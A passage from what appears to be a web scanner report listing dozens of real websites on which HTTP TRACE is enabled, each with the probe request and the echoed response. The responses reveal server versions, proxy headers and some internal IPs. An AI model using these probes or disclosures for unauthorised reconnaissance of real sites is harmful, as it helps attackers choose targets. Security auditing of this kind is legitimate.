Content-Type: message/http

TRACE / HTTP/1.0
Host: www.lyricsmania.com
Cookie: aba02a2c8ea7a5cd

21.147. http://www.macrumors.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.macrumors.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.macrumors.com
Cookie: ab0a093f9157dff3

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:36:37 GMT
Server: Apache/1.3.41 (Unix) PHP/4.4.9 mod_gzip/1.3.26.1a mod_log_bytes/1.2 mod_bwlimited/1.4 mod_ssl/2.8.31 OpenSSL/0.9.8b
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: ab0a093f9157dff3
Host: www.macrumors.com

21.148. http://www.made-in-china.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.made-in-china.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.made-in-china.com
Cookie: a758c821fa9b2947

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:03:08 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.made-in-china.com
Cookie: a758c821fa9b2947

21.149. http://www.mainstreet.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mainstreet.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.mainstreet.com
Cookie: 10d8b960120dc784

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:04:44 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.mainstreet.com
Cookie: 10d8b960120dc784
X-Forwarded-For: 173.193.214.243

21.150. http://www.manualsonline.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.manualsonline.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.manualsonline.com
Cookie: 232135f444a521e0

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:46:13 GMT
Server: Apache/2.2.14 (Fedora)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.manualsonline.com
Cookie: 232135f444a521e0

21.151. http://www.mapsofworld.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mapsofworld.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.mapsofworld.com
Cookie: 674bb8472c974c6f

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:50:32 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_jk/1.2.25 mod_perl/2.0.4 Perl/v5.8.8
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.mapsofworld.com
Cookie: 674bb8472c974c6f

21.152. http://www.mediatakeout.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mediatakeout.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.mediatakeout.com
Cookie: eff1e1a632404552

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:32:39 GMT
Server: Apache/2.2.8 (Ubuntu)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.mediatakeout.com
Cookie: eff1e1a632404552

21.153. http://www.medicalnewstoday.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.medicalnewstoday.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.medicalnewstoday.com
Cookie: b8437cd3628dac81

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:13:23 GMT
Server: Apache/2.0.52 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.medicalnewstoday.com
Cookie: b8437cd3628dac81

21.154. http://www.menupages.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.menupages.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.menupages.com
Cookie: ea3bf7a5761eb8e6

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:56:12 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.menupages.com
Cookie: ea3bf7a5761eb8e6
X-Forwarded-For: 173.193.214.243

21.155. http://www.metafilter.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.metafilter.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.metafilter.com
Cookie: 68aabb5ddf85eb1e

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:42:46 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.metafilter.com
Cookie: 68aabb5ddf85eb1e

21.156. http://www.mindjolt.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mindjolt.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.mindjolt.com
Cookie: 8d36b7cf2822ae46

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:44:44 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.mindjolt.com
Cookie: 8d36b7cf2822ae46

21.157. http://www.miniclip.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.miniclip.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.miniclip.com
Cookie: 9b2040074ee8ceda

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS) DAV/2 mod_python/3.2.8 Python/2.4.3 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 mod_perl/2.0.4 Perl/v5.8.8
Content-Type: message/http
X-Cacheable: NO:Not-Cacheable
Content-Length: 126
Date: Sat, 02 Apr 2011 13:25:39 GMT
X-Varnish: 902365369
Age: 0
Via: 1.1 varnish
Connection: close
X-Served-By: webftl61
X-Cache: MISS

TRACE / HTTP/1.0
Host: www.miniclip.com
Cookie: 9b2040074ee8ceda
X-Forwarded-For: 173.193.214.243
X-Varnish: 902365369

21.158. http://www.mochila.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mochila.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.mochila.com
Cookie: 9ad861ce133c2e3b

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
Content-Type: message/http
Date: Sat, 02 Apr 2011 13:45:11 GMT
Connection: close

TRACE / HTTP/1.0
Host: www.mochila.com
X-Cluster-Client-Ip: 173.193.214.243
Cookie: 9ad861ce133c2e3b
Connection: Keep-Alive

21.159. http://www.mp3raid.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mp3raid.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.mp3raid.com
Cookie: 3b82fdea94e32abc

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:06:03 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.3.1
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.mp3raid.com
Cookie: 3b82fdea94e32abc

21.160. http://www.mrmovietimes.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mrmovietimes.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.mrmovietimes.com
Cookie: afd4039c9673b179

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:00:53 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch13 mod_ssl/2.2.3 OpenSSL/0.9.8c
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.mrmovietimes.com
Cookie: afd4039c9673b179

21.161. http://www.multiply.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.multiply.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.multiply.com
Cookie: d4c50a69cfba31df

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:37:38 GMT
Server: Apache/1.3.29 (Unix) mod_perl/1.29
Cache-Control: max-age=25920000
Expires: Fri, 27 Jan 2012 13:37:38 GMT
Content-Type: message/http
X-Cache: MISS from multiply.com
Connection: close

TRACE / HTTP/1.1
Connection: close
Cookie: d4c50a69cfba31df
Host: ws577-fe.pn.pezarisdesign.com:32000
X-Forwarded-For: 173.193.214.243
X-Forwarded-Host: www.multiply.com
X-Forwarded-Server: multiply.com

21.162. http://www.mylocalemployment.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mylocalemployment.net
Path:   /

Request

TRACE / HTTP/1.0
Host: www.mylocalemployment.net
Cookie: 1f9dd41a33ccbc1e

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Content-Type: message/http
Date: Sat, 02 Apr 2011 13:56:31 GMT
Connection: close

TRACE / HTTP/1.0
Host: www.mylocalemployment.net
X-Cluster-Client-Ip: 173.193.214.243
Cookie: 1f9dd41a33ccbc1e
Connection: Keep-Alive

21.163. http://www.mysanantonio.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mysanantonio.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.mysanantonio.com
Cookie: c17086dae433ef7a

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:10:15 GMT
Server: Apache/2.2.3 (Red Hat)
Content-Type: message/http
Accept-Ranges: bytes
Cache-Control: public
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
x-cdn: Cotendo
Connection: close

TRACE / HTTP/1.1
Host: www.mysanantonio.com
Cookie: c17086dae433ef7a
Accept-Encoding: gzip
Connection: Keep-Alive
X-Forwarded-For: 173.193.214.243
x-chpd-loop: 1
Via: 1.0 PXY013-ASHB.COTENDO.NET (chpd/3.06.0052)

21.164. http://www.mystart.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mystart.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.mystart.com
Cookie: c8aa7791f92888ef

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:06:19 GMT
Server: Microsoft-IIS/5.0
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: c8aa7791f92888ef
Host: www.mystart.com

21.165. http://www.myway.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.myway.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.myway.com
Cookie: 6edcabcd2b0fb19c

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:33:21 GMT
Server: Apache/2.0.43 (Unix)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.myway.com
Cookie: 6edcabcd2b0fb19c

21.166. http://www.mywebsearch.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mywebsearch.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.mywebsearch.com
Cookie: 9f9612afe809f48e

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:37:24 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8c DAV/2 mod_jk/1.2.28
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.mywebsearch.com
Cookie: 9f9612afe809f48e
X-Jabodo-For: 173.193.214.243

21.167. http://www.newgrounds.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newgrounds.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.newgrounds.com
Cookie: afe7b4015eb3ef76

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:37:24 GMT
Server: Apache/2.2.17 (Unix)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.newgrounds.com
Cookie: afe7b4015eb3ef76

21.168. http://www.newsweek.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsweek.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.newsweek.com
Cookie: e6dc1dc72928a957

Response

HTTP/1.1 200 OK
Age: 0
Content-Type: message/http
Date: Sat, 02 Apr 2011 13:26:37 GMT
Server: Apache
Via: 1.1 varnish
X-Cacheable: YES
X-Varnish: 2022418692
Content-Length: 171
Connection: Close

TRACE / HTTP/1.1
host: www.newsweek.com
Cookie: e6dc1dc72928a957
X-Forwarded-Port: 80
X-Forwarded-Proto: http
X-Varnish: 2022418692
X-Forwarded-For: 10.223.62.50

21.169. http://www.nih.gov/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nih.gov
Path:   /

Request

TRACE / HTTP/1.0
Host: www.nih.gov
Cookie: db28019783db12a6

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Sat, 02 Apr 2011 13:23:39 GMT
Content-type: message/http
Connection: close

TRACE / HTTP/1.0
Host: www.nih.gov
Cookie: db28019783db12a6

21.170. http://www.npr.org/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.npr.org
Path:   /

Request

TRACE / HTTP/1.0
Host: www.npr.org
Cookie: 8aa8252b840ae44a

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:43:44 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.npr.org
Cookie: 8aa8252b840ae44a
Connection: Keep-Alive
X-Forwarded-For: 173.193.214.243

21.171. http://www.nps.gov/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nps.gov
Path:   /

Request

TRACE / HTTP/1.0
Host: www.nps.gov
Cookie: f06249f23b15d585

Response

HTTP/1.1 200 OK
Server: Footprint 4.6/FPMCP
Mime-Version: 1.0
Date: Sat, 02 Apr 2011 13:40:29 GMT
Content-Type: message/http
Content-Length: 97
Expires: Sat, 02 Apr 2011 13:40:29 GMT
Connection: close

TRACE / HTTP/1.0
Host: www.nps.gov
Cookie: f06249f23b15d585
_FP_X_URL: http://www.nps.gov/

21.172. http://www.ocregister.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ocregister.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.ocregister.com
Cookie: ba57f63db632c662

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:03:45 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.ocregister.com
Cookie: ba57f63db632c662

21.173. http://www.onlinesearches.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.onlinesearches.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.onlinesearches.com
Cookie: 1bb257344b356843

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:38:49 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.onlinesearches.com
Cookie: 1bb257344b356843

21.174. http://www.onlywire.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.onlywire.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.onlywire.com
Cookie: 3112ee4e8b879df2

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:53:29 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.onlywire.com
Cookie: 3112ee4e8b879df2

21.175. http://www.openmyeyeslord.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.openmyeyeslord.net
Path:   /

Request

TRACE / HTTP/1.0
Host: www.openmyeyeslord.net
Cookie: 212b59789f991a21

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:50:14 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.11
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.openmyeyeslord.net
Cookie: 212b59789f991a21

21.176. http://www.opera.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opera.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.opera.com
Cookie: 247651e61881aa1e

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:03:17 GMT
Server: Apache
Content-Type: message/http
Connection: close

TRACE / HTTP/1.1
Host: www.opera.com
Cookie: 247651e61881aa1e
X-Forwarded-For: 173.193.214.243
X-Forwarded-Host: www.opera.com
X-Forwarded-Server: www.opera.com
Connection: Keep-Alive

21.177. http://www.outsidehub.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.outsidehub.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.outsidehub.com
Cookie: 6002f49d09f1c928

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:17:44 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.outsidehub.com
Cookie: 6002f49d09f1c928

21.178. http://www.parenting.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.parenting.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.parenting.com
Cookie: b2b48c8e18c44a5e

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: message/http
Content-Length: 128
Date: Sat, 02 Apr 2011 14:12:40 GMT
X-Varnish: 2020012493
Via: 1.1 varnish
Connection: close
age: 0
X-Cache: webcache12: MISS

TRACE / HTTP/1.0
Host: www.parenting.com
Cookie: b2b48c8e18c44a5e
X-Forwarded-For: 173.193.214.243
X-Varnish: 2020012493

21.179. http://www.pbs.org/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pbs.org
Path:   /

Request

TRACE / HTTP/1.0
Host: www.pbs.org
Cookie: c165129a0d28de7f

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:35:30 GMT
Server: Apache/2.2.3 (CentOS)
Content-Type: message/http
Content-Length: 303
Set-Cookie: www.apache.sid=16a73cde8bf7c09962e1c8a22a1f6d8e; path=/; domain=.pbs.org
Connection: close

TRACE / HTTP/1.1
host: www.pbs.org
Cookie: c165129a0d28de7f
MAX-FORWARDS: 9
X-Forwarded-Host: www.pbs.org
X-Forwarded-Server: www.pbs.org
X-Original-URL: http://www.pbs.org/
X-Forwarded-For: 173.193.214.243, 149.48.228.24
X-Forwarded-Port: 80
X-Forwarde
...[SNIP]...
21.180. http://www.peopleofwalmart.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.peopleofwalmart.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.peopleofwalmart.com
Cookie: 5578e542fe3b124d

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:51:20 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.peopleofwalmart.com
Cookie: 5578e542fe3b124d

21.181. http://www.pgatour.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pgatour.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.pgatour.com
Cookie: 56462c4418932335

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:26:41 GMT
Server: Apache
Content-Type: message/http
Connection: close

TRACE / HTTP/1.1
Host: www.pgatour.com
Cookie: 56462c4418932335
X-Forwarded-For: 173.193.214.243
X-Forwarded-Host: www.pgatour.com
X-Forwarded-Server: www.pgatour.com
Connection: Keep-Alive

21.182. http://www.pickyourown.org/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pickyourown.org
Path:   /

Request

TRACE / HTTP/1.0
Host: www.pickyourown.org
Cookie: aa1691df677c1a75

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:04:09 GMT
Server: Apache/1.3.42 (Unix) mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8e-fips-rhel5
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: aa1691df677c1a75
Host: www.pickyourown.org

21.183. http://www.picsearch.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.picsearch.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.picsearch.com
Cookie: 37a99437bfdec998

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:19:03 GMT
Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.7 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.picsearch.com
Cookie: 37a99437bfdec998

21.184. http://www.pittsburghlive.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pittsburghlive.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.pittsburghlive.com
Cookie: e93907c0f6f4a71

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:10:01 GMT
Server: Apache/2.2.3 (Red Hat) PHP/5.1.6
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.pittsburghlive.com
Cookie: e93907c0f6f4a71

21.185. http://www.playfin.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.playfin.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.playfin.com
Cookie: 6a9574b1d4eddbd6

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:06:51 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.playfin.com
Cookie: 6a9574b1d4eddbd6

21.186. http://www.politicsdaily.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.politicsdaily.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.politicsdaily.com
Cookie: 520d51af5877f5b0

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:07:08 GMT
Server: Apache/2.2
Vary: Host
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.politicsdaily.com
Cookie: 520d51af5877f5b0
Connection: Keep-Alive
X-LB-Client-IP: 173.193.214.243
X-Forwarded-For: 173.193.214.243
X-CHAD: 6:1:21:917D:200483,x-lb-client-ip:ajg_u

21.187. http://www.popularscreensavers.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.popularscreensavers.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.popularscreensavers.com
Cookie: 11abf97cb14d7065

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:34:45 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8c DAV/2 mod_jk/1.2.28
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.popularscreensavers.com
Cookie: 11abf97cb14d7065
X-Jabodo-For: 173.193.214.243

21.188. http://www.primarygames.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.primarygames.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.primarygames.com
Cookie: e8f8d43475f08045

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 12:18:41 GMT
Server: Apache/2.2.12 (Unix) mod_ssl/2.2.12 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.10
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.primarygames.com
Cookie: e8f8d43475f08045

21.189. http://www.pronto.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pronto.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.pronto.com
Cookie: e0d0eea6b234bf82

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:23:44 GMT
Server: Apache/2.2.4 (Fedora)
Connection: close
Content-Type: message/http
Via: CN-5000

TRACE / HTTP/1.0
Host: www.pronto.com
Cookie: e0d0eea6b234bf82
Via: CN-5000
Cres-Client-IP: 173.193.214.243
Connection: Keep-Alive

21.190. http://www.psu.edu/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.psu.edu
Path:   /

Request

TRACE / HTTP/1.0
Host: www.psu.edu
Cookie: e2a104a19001693e

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:04:02 GMT
Server: Apache/1.3.41 (Unix)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: e2a104a19001693e
Host: www.psu.edu

21.191. http://www.publicrecordschecks.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.publicrecordschecks.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.publicrecordschecks.com
Cookie: 3739531c99efd244

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:36:13 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e DAV/2
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.publicrecordschecks.com
Cookie: 3739531c99efd244

21.192. http://www.purdue.edu/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.purdue.edu
Path:   /

Request

TRACE / HTTP/1.0
Host: www.purdue.edu
Cookie: 30ffec7a438a3f7

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:00:36 GMT
Server: IBM_HTTP_Server
Connection: close
Content-Type: message/http
Set-Cookie: BIGipServerPool_old-PPWC_all=1729800384.0.0000; path=/

TRACE / HTTP/1.0
Host: www.purdue.edu
Cookie: 30ffec7a438a3f7

21.193. http://www.purplemath.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.purplemath.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.purplemath.com
Cookie: 29ca8e3b5d74bced

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:19:29 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.purplemath.com
Cookie: 29ca8e3b5d74bced

21.194. http://www.quizlet.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.quizlet.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.quizlet.com
Cookie: a4a517ecc5391b14

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: message/http
Date: Sat, 02 Apr 2011 14:05:58 GMT
Connection: close

TRACE / HTTP/1.0
X-Forwarded-For: 173.193.214.243
Host: www.quizlet.com
Cookie: a4a517ecc5391b14
Connection: Keep-Alive

21.195. http://www.rasmussenreports.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rasmussenreports.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.rasmussenreports.com
Cookie: 4cef48a44583a75f

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:37:48 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.rasmussenreports.com
Cookie: 4cef48a44583a75f

21.196. http://www.rawtube.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rawtube.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.rawtube.com
Cookie: e518e292eaa63a02

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Content-Type: message/http
Content-Length: 125
Via: www.rawtube.com
Date: Sat, 02 Apr 2011 12:32:31 GMT
X-Varnish: 863747459
Age: 0
Via: 1.1 varnish
Connection: close

TRACE / HTTP/1.0
Host: www.rawtube.com
Cookie: e518e292eaa63a02
X-Varnish: 863747459
X-Forwarded-For: 173.193.214.243

21.197. http://www.rent.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rent.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.rent.com
Cookie: 5e7b2527606ea454

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:34:39 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Connection: Keep-Alive
Cookie: 5e7b2527606ea454
Host: www.rent.com
X-NS-Forwarded-For: 173.193.214.243
X-NS-IP-Port: 10.63.8.10_80

21.198. http://www.retailmenot.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.retailmenot.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.retailmenot.com
Cookie: cfa97be4589240c8

Response

HTTP/1.1 200 OK
Content-Type: message/http
Date: Sat, 02 Apr 2011 13:33:05 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
Content-Length: 178
Connection: Close

TRACE / HTTP/1.1
host: www.retailmenot.com
Cookie: cfa97be4589240c8
X-Forwarded-For: 173.193.214.243
X-Forwarded-Port: 80
X-Forwarded-Proto: http
Connection: keep-alive

21.199. http://www.retrevo.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.retrevo.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.retrevo.com
Cookie: 8871f4c97521fcf5

Response

HTTP/1.1 200 OK
Set-Cookie: JSESSIONID=4CC239D32C9D4452C2B2144F0716B71F; Path=/
Content-Type: message/http
Content-Length: 73
Date: Sat, 02 Apr 2011 13:38:22 GMT
Server: Apache-Coyote/1.1
Connection: close

TRACE /search HTTP/1.0
host: www.retrevo.com
cookie: 8871f4c97521fcf5
21.200. http://www.roxwel.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.roxwel.com
Path:   /

Request

